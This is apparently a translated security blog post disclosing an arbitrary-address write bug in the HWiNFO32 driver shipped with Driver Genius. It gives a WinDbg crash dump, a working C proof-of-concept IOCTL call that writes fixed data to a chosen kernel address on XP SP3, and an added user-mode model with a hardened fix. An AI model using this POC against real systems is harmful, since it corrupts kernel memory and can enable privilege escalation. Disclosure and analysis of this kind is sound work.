
HWiNFO32 Driver Arbitrary Address Write (Fixed Data) Vulnerability

Posted: 2017-12-29 14:42:04

I found this vulnerability while looking into Driver Genius (驱动精灵). It eventually turned out to be a problem in the HWiNFO32 driver that Driver Genius calls, and HWiNFO32 is not a driver developed by Driver Genius, which is why I went back and forth on the title. Enough preamble; let's begin.

The HWiNFO32 driver does not filter its input strictly, which results in an arbitrary-address write of fixed data. Driver Genius bundles HWiNFO32 under the name Mydriver32.sys. I found this quite a while ago and no longer remember the version; it was whatever the latest build was when I installed Driver Genius at the time.

Details of the vulnerability: in the DeviceIoControl dispatch routine, when IoControlCode = 0x85FE2600, the driver does not strictly validate the user-supplied lpOutBuffer parameter and calls nt!IopfCompleteRequest directly. After a chain of further processing the fault occurs in nt!IopCompleteRequest, where an arbitrary address gets written. Because the code that ultimately faults lives in nt!IopCompleteRequest, the behaviour also depends on the OS version: in testing, XP SP3 is exploitable, while Win7 is unaffected.

Here is the WinDbg crash information.

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffff0000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 804ed09b, If non-zero, the instruction address which referenced the bad memory
        address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

WRITE_ADDRESS:  ffff0000

FAULTING_IP:
nt!IopCompleteRequest+92
804ed09b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

MM_INTERNAL_CODE:  0

DEFAULT_BUCKET_ID:  CODE_CORRUPTION

BUGCHECK_STR:  0x50

PROCESS_NAME:  TestMyDriver32_

IRP_ADDRESS:  82177f68

DEVICE_OBJECT: 81d5f518

DRIVER_OBJECT: 81d26288

IMAGE_NAME:  DgSafe.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  540684f3

MODULE_NAME: DgSafe

FAULTING_MODULE: b1250000 mydrivers32

TRAP_FRAME:  b137f91c -- (.trap 0xffffffffb137f91c)
ErrCode = 00000002
eax=00000110 ebx=82177f68 ecx=00000044 edx=00000001 esi=81f24680 edi=ffff0000
eip=804ed09b esp=b137f990 ebp=b137f9d4 iopl=0         nv up ei pl nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206
nt!IopCompleteRequest+0x92:
804ed09b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
Resetting default scope

LAST_CONTROL_TRANSFER:  from 80533797 to 804e450a

STACK_TEXT:
b137f46c 80533797 00000003 ffff0000 00000000 nt!RtlpBreakWithStatusInstruction
b137f4b8 8053426e 00000003 806f2298 c03fffc0 nt!KiBugCheckDebugBreak+0x19
b137f898 8053485e 00000050 ffff0000 00000001 nt!KeBugCheck2+0x574
b137f8b8 805251a8 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b137f904 804e2747 00000001 ffff0000 00000000 nt!MmAccessFault+0x6f5
b137f904 804ed09b 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b137f9d4 804ed11a 82177fa8 b137fa20 b137fa14 nt!IopCompleteRequest+0x92
b137fa24 806f2c35 00000000 00000000 b137fa3c nt!KiDeliverApc+0xb3
b137fa24 806f2861 00000000 00000000 b137fa3c hal!HalpApcInterrupt+0xc5
b137faac 804e63cc 82177fa8 82177f68 00000000 hal!KeReleaseInStackQueuedSpinLock+0x11
b137facc 804ed134 82177fa8 81d2d588 00000000 nt!KeInsertQueueApc+0x4b
b137fb00 b1251f27 81d2d588 81d26288 82177f68 nt!IopfCompleteRequest+0x1d8
WARNING: Stack unwind information not available. Following frames may be wrong.
b137fc34 804e4767 81d5f518 82177f68 806f22d0 mydrivers32+0x1f27
b137fc44 805692ab 82177fd8 81d2d588 82177f68 nt!IopfCallDriver+0x31
b137fc58 805781e2 81d5f518 82177f68 81d2d588 nt!IopSynchronousServiceTail+0x70
b137fd00 8057a705 00000054 00000000 00000000 nt!IopXxxControlFile+0x611
b137fd34 804df7f8 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
b137fd34 7c92e514 00000054 00000000 00000000 nt!KiSystemServicePostCall
0013fed8 7c92d28a 7c801675 00000054 00000000 ntdll!KiFastSystemCallRet
0013fedc 7c801675 00000054 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc
0013ff3c 00401058 00000054 85fe2600 0013ff68 kernel32!DeviceIoControl+0xdd

FOLLOWUP_NAME:  MachineOwner

MEMORY_CORRUPTOR:  PATCH_DgSafe

FAILURE_BUCKET_ID:  MEMORY_CORRUPTION_PATCH_DgSafe

BUCKET_ID:  MEMORY_CORRUPTION_PATCH_DgSafe

Followup: MachineOwner

Code flow: mydrivers32 -> nt!IopfCompleteRequest -> nt!IopCompleteRequest. (Note that !analyze buckets the crash under DgSafe.sys in IMAGE_NAME and MEMORY_CORRUPTOR, but the stack shows the IRP being completed from mydrivers32+0x1f27.) At mydrivers32+0x1f27, when IoControlCode = 0x85FE2600, the driver performs no validation at all on the user-supplied output buffer (OUTBUFF) before calling nt!IopfCompleteRequest directly, and IopfCompleteRequest contains the following code.

[Image: disassembly of the nt!IopfCompleteRequest code referred to above; not reproduced in text]

It is this code that causes the vulnerability. Going by the calling code, the data copied to the target should be the data from the POC, yet in practice it is fixed at 0x2; I don't know why and would welcome an explanation. (A reading consistent with the trap frame: for a METHOD_BUFFERED IOCTL, when the IRP completes successfully the I/O manager copies Irp->IoStatus.Information bytes from Irp->AssociatedIrp.SystemBuffer to Irp->UserBuffer, and UserBuffer is the raw lpOutBuffer, which IopXxxControlFile never probed because nOutBufferSize was 0. The copy source is therefore SystemBuffer as the driver left it at completion, i.e. the driver's reply rather than the caller's input, and the copy length is the driver's Information value, here 0x110 bytes, the 0x44 dwords remaining in ecx.) The usable POC code follows.

#include <windows.h>
#include <stdio.h>
#include <tchar.h>

VOID TestMyDriver32()
{
    HANDLE hCreateFile     = INVALID_HANDLE_VALUE;
    DWORD  dwInBuffer      = 0x6c77792a;
    DWORD  dwOutBuffer     = 0xf8be8020;   // kernel writable address, change as needed
    DWORD  dwBytesReturned = 0;

    hCreateFile = CreateFileA("\\\\.\\HWiNFO32",
                              0,                                  // no access to the drive
                              FILE_SHARE_READ | FILE_SHARE_WRITE, // share mode
                              NULL,                               // default security attributes
                              OPEN_EXISTING,                      // disposition
                              0,                                  // file attributes
                              NULL);
    if (hCreateFile == INVALID_HANDLE_VALUE)
    {
        printf("Error Open Device!\n");
        return;
    }

    // Input: 4 bytes of data. Output: the raw target address with length 0, so the
    // I/O manager never probes it before the driver completes the IRP.
    DeviceIoControl(hCreateFile, 0x85FE2600,
                    &dwInBuffer, 4,
                    (LPVOID)dwOutBuffer, 0,
                    &dwBytesReturned, NULL);
    CloseHandle(hCreateFile);
    return;
}

int _tmain(int argc, _TCHAR* argv[])
{
    char cSSS[10];
    TestMyDriver32();
    scanf("%9s", cSSS);   // keep the console open until a key is pressed
    return 0;
}
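To make the mechanism behind the crash concrete, here is an added example of my own; it is not code from the original post and not source from the HWiNFO32 or Driver Genius drivers. It is a user-mode model of the I/O manager's METHOD_BUFFERED output path in plain C, so it compiles anywhere, with a dispatch routine of the vulnerable kind described above placed next to a hardened one. Everything in it is assumed for illustration: ModelIrp and model_ioctl stand in for the real IRP, IopXxxControlFile and IopCompleteRequest; is_user_range stands in for ProbeForWrite; the two static arrays stand in for user and kernel memory; RESPONSE_SIZE is 0x110 only because that is the copy length in the trap frame above; and the driver's reply is filled with 0x02 to mirror the fixed value the post reports.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STATUS_SUCCESS          0x00000000u
#define STATUS_ACCESS_VIOLATION 0xC0000005u
#define STATUS_BUFFER_TOO_SMALL 0xC0000023u
#define RESPONSE_SIZE 0x110   /* copy length in the trap frame: 0x44 dwords */

/* Assumed stand-ins for memory: the only range the model treats as user-
   writable, and a "kernel" page that no IOCTL should ever be able to reach. */
static uint8_t g_user_arena[0x200];
static uint8_t g_kernel_page[0x200];

/* Cut-down IRP holding just the fields the METHOD_BUFFERED completion uses. */
typedef struct {
    void    *SystemBuffer;        /* Irp->AssociatedIrp.SystemBuffer */
    void    *UserBuffer;          /* Irp->UserBuffer, the raw lpOutBuffer */
    size_t   OutputBufferLength;  /* Parameters.DeviceIoControl.OutputBufferLength */
    size_t   Information;         /* Irp->IoStatus.Information */
    uint32_t Status;              /* Irp->IoStatus.Status */
} ModelIrp;

typedef void (*DispatchFn)(ModelIrp *irp);

/* Stand-in for ProbeForWrite: true only for ranges inside the user arena. */
static int is_user_range(const void *p, size_t len) {
    uintptr_t lo = (uintptr_t)g_user_arena, hi = lo + sizeof g_user_arena;
    uintptr_t a = (uintptr_t)p;
    return a >= lo && a <= hi && len <= hi - a;
}

/* Vulnerable pattern (the bug class in the post): the driver writes its reply and
   sets Information to the reply size without consulting OutputBufferLength. The
   reply is the driver's own data, so the bytes landing at the target are fixed. */
static void vuln_dispatch(ModelIrp *irp) {
    memset(irp->SystemBuffer, 0x02, RESPONSE_SIZE);
    irp->Information = RESPONSE_SIZE;
    irp->Status = STATUS_SUCCESS;
}

/* Hardened pattern: fail before writing anything if the caller's buffer cannot
   hold the reply, so Information never exceeds the length that was probed. */
static void safe_dispatch(ModelIrp *irp) {
    if (irp->OutputBufferLength < RESPONSE_SIZE) {
        irp->Information = 0;
        irp->Status = STATUS_BUFFER_TOO_SMALL;
        return;
    }
    memset(irp->SystemBuffer, 0x02, RESPONSE_SIZE);
    irp->Information = RESPONSE_SIZE;
    irp->Status = STATUS_SUCCESS;
}

/* Model of NtDeviceIoControlFile -> dispatch -> IopCompleteRequest for a
   METHOD_BUFFERED IOCTL. Input probing and pool sizing are left out. */
static uint32_t model_ioctl(DispatchFn dispatch, const void *in, size_t in_len,
                            void *out, size_t out_len, size_t *returned) {
    static uint8_t system_buffer[0x200];   /* stands in for the pool buffer */
    ModelIrp irp;
    memset(&irp, 0, sizeof irp);

    /* IopXxxControlFile probes lpOutBuffer only when nOutBufferSize != 0; with
       a zero length the raw pointer is stored in UserBuffer unchecked. */
    if (out_len != 0 && !is_user_range(out, out_len))
        return STATUS_ACCESS_VIOLATION;

    memcpy(system_buffer, in, in_len < sizeof system_buffer ? in_len : sizeof system_buffer);
    irp.SystemBuffer = system_buffer;
    irp.UserBuffer = out;
    irp.OutputBufferLength = out_len;

    dispatch(&irp);

    /* IopCompleteRequest: on success, copy Information bytes from SystemBuffer to
       UserBuffer (the rep movs in the trap frame). Nothing is re-checked here;
       the probe above was the only guard, and it was skipped. */
    if (irp.Status == STATUS_SUCCESS && irp.Information != 0)
        memcpy(irp.UserBuffer, irp.SystemBuffer, irp.Information);

    *returned = irp.Information;
    return irp.Status;
}

/* The post's POC shape: same 4-byte input, a kernel address as lpOutBuffer,
   nOutBufferSize 0. Returns 1 if the completion copy reached the kernel page. */
static int poc_writes_kernel(DispatchFn dispatch) {
    uint32_t in = 0x6c77792a;
    size_t returned = 0;
    memset(g_kernel_page, 0, sizeof g_kernel_page);
    model_ioctl(dispatch, &in, sizeof in, g_kernel_page, 0, &returned);
    return g_kernel_page[0] == 0x02 && returned == RESPONSE_SIZE;
}

/* A normal caller whose user buffer has out_len bytes available. */
static uint32_t user_call(DispatchFn dispatch, size_t out_len) {
    uint32_t in = 0x6c77792a;
    size_t returned = 0;
    return model_ioctl(dispatch, &in, sizeof in, g_user_arena, out_len, &returned);
}

int main(void) {
    printf("vulnerable, POC call: kernel page written = %d\n", poc_writes_kernel(vuln_dispatch));
    printf("hardened,   POC call: kernel page written = %d\n", poc_writes_kernel(safe_dispatch));
    printf("hardened, 4-byte buf: status = 0x%08x\n", (unsigned)user_call(safe_dispatch, 4));
    return 0;
}
```

Compile it with any C compiler and run it. The calls worth comparing are poc_writes_kernel, which uses the POC's shape (kernel address, zero length) and only reaches the kernel page with vuln_dispatch, and user_call(safe_dispatch, 4), which shows the hardened driver rejecting a too-small buffer with STATUS_BUFFER_TOO_SMALL instead of letting Information exceed what was probed. The fix in real driver code is the same check: for a METHOD_BUFFERED IOCTL, never set IoStatus.Information larger than OutputBufferLength.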

Figure 1 shows the result of triggering the vulnerability.

[Figure 1: screenshot of the triggered vulnerability; not reproduced in text]


© 2017 www.ziyuanla.com. All rights reserved.